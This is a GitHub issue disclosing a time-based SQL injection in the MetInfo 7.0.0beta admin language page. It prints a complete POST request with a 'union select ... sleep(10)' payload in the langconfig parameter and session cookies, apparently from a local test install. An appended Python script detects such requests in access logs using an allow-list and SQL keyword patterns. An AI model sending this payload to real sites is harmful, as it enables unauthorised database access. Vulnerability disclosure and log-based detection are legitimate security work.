Metinfo7.0 admin background SQL Injection #3

Open
SZFsir opened this issue Nov 7, 2019 · 0 comments
SZFsir commented Nov 7, 2019

Vulnerability Name: Metinfo7.0.0beta CMS SQL Injection
Product Homepage: https://www.metinfo.cn/
Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta
Version: V7.0.0

After admin login (you must send different order and mark columns below):

payload

POST /metinfo/7.0beta/admin/?n=language&c=language_web&a=doAddLanguage&langconfig=1%20union%20select%201,2,3,4,sleep(10)%23 HTTP/1.1
Host: 127.0.0.1:7000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------19314199136116280411402994027
Content-Length: 1763
Origin: http://127.0.0.1:7000
Connection: close
Referer: http://127.0.0.1:7000/metinfo/7.0beta/admin/?lang=cn&n=ui_set
Cookie: think_template=default; PHPSESSID=4a94ab2d971cee639ee614b5e469c456; upgraderemind=1; MEIQIA_VISIT_ID=1TCdE0t3buLmzz4IApfJNsjGjyj; acc_auth=6b04vpU051F%2F6wN0ICCF6vnI4A6LL3y077MyxZyQ9UGOhaZ21aOrwAybTO9AFQWJPAx43UeHIsCEPhVBCEZmqWUq; acc_key=TasaQFt;  Hm_lvt_520556228c0113270c0c772027905838=1573030774; Hm_lpvt_520556228c0113270c0c772027905838=1573062137; re_url=http%3A%2F%2F127.0.0.1%2Fmetinfo%2F7.0beta%2Fadmin%2F; met_auth=91a0MGQ%2F%2FmzVp57PpH7xa%2B156lDDaFD3i1oczcMgjfXhSdOtiJ85lBqtyj6RPkm41fJ6vR2sCavBRxbyGT6QqowQ; met_key=hUhOIRJ; admin_lang=cn; page_iframe_url=http%3A%2F%2F127.0.0.1%3A7000%2Fmetinfo%2F7.0beta%2Findex.php%3Flang%3Dcn%26pageset%3D1

-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="order"

999
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="autor"

0
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="name"

qqqq
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="flag"

cn.gif
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="mark"

888
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="file"

cn
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="copy_config"

cn
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="content"


-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="theme_style"


-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="useok"

1
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="link"


-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="useok"

1
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="newwindows"

0
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="type"

0
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="submit_type"

save
-----------------------------19314199136116280411402994027--

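A log check for the request reported above, added here as a defender's example (it is not code from the issue or from MetInfo): it flags `doAddLanguage` requests whose `langconfig` query value is not a short identifier and lists the SQL tokens found for triage. The combined log format, the sample lines and the assumption that a legitimate `langconfig` value is a short language code are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); not taken from the issue.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Nov/2019:10:01:02 +0800] "POST /metinfo/7.0beta/admin/'
    '?n=language&c=language_web&a=doAddLanguage&langconfig=cn HTTP/1.1" 200 64',
    '10.0.0.9 - - [07/Nov/2019:10:03:40 +0800] "POST /metinfo/7.0beta/admin/'
    '?n=language&c=language_web&a=doAddLanguage'
    '&langconfig=1%20union%20select%201,2,3,4,sleep(10)%23 HTTP/1.1" 200 64',
    '10.0.0.5 - - [07/Nov/2019:10:04:11 +0800] "GET /metinfo/7.0beta/admin/'
    '?lang=cn&n=ui_set HTTP/1.1" 200 5120',
]

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Assumption: a legitimate langconfig value is a short language code.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,32}")

# Tokens worth naming in an alert; used for triage only, not as the gate.
SQL_TOKENS = re.compile(r"\b(?:union|select|sleep|benchmark)\b|#|--|/\*|'", re.I)


def suspicious_requests(lines):
    """Return (client, decoded langconfig, SQL tokens) for each flagged request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        # parse_qs percent-decodes, so %20 and %23 are seen as ' ' and '#'.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if query.get("a") != ["doAddLanguage"]:
            continue
        for value in query.get("langconfig", []):
            # Allow-list first: anything that is not a plain code is flagged,
            # even if it contains none of the tokens listed above.
            if not SAFE_VALUE.fullmatch(value):
                tokens = sorted({t.lower() for t in SQL_TOKENS.findall(value)})
                hits.append((client, value, tokens))
    return hits


if __name__ == "__main__":
    for client, value, tokens in suspicious_requests(SAMPLE_LOG):
        print(f"{client} langconfig={value!r} tokens={tokens}")
```

The allow-list is the gate, so a rewritten query that avoids the listed keywords is still flagged; the same allow-list applied server-side before `langconfig` reaches the query would reject the request outright.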